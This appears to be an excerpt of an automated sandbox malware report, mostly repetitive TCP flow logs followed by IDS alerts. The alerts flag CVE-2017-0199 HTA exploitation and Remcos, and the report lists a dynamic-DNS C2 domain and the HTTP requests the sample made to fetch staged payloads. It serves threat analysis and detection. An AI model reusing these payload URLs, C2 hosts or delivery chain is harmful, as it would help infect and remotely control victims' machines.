                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49170 -> 192.3.64.135:14645
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49175 -> 192.3.193.155:80
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.193.155:80 -> 192.168.2.22:49169
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.193.155:80 -> 192.168.2.22:49169
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.193.155:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.193.155:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49168
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49176
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: cloudsave.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: cloudsave.duckdns.org
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/REDS.txt HTTP/1.1Host: 192.3.193.155Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/REDS.txt HTTP/1.1Host: 192.3.193.155Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
                  Source: Joe Sandbox ViewIP Address: 88.99.66.38 88.99.66.38
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49172 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /pitash HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.193.155Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8895-Connection: Keep-AliveHost: 192.3.193.155If-Range: "1ccb3-620b4202337ba"
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/wecreatedbuttersmoothbutterthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.193.155Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 28 Aug 2024 01:17:45 GMTConnection: Keep-AliveHost: 192.3.193.155If-None-Match: "1ccb3-620b4202337ba"
                  Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.193.155
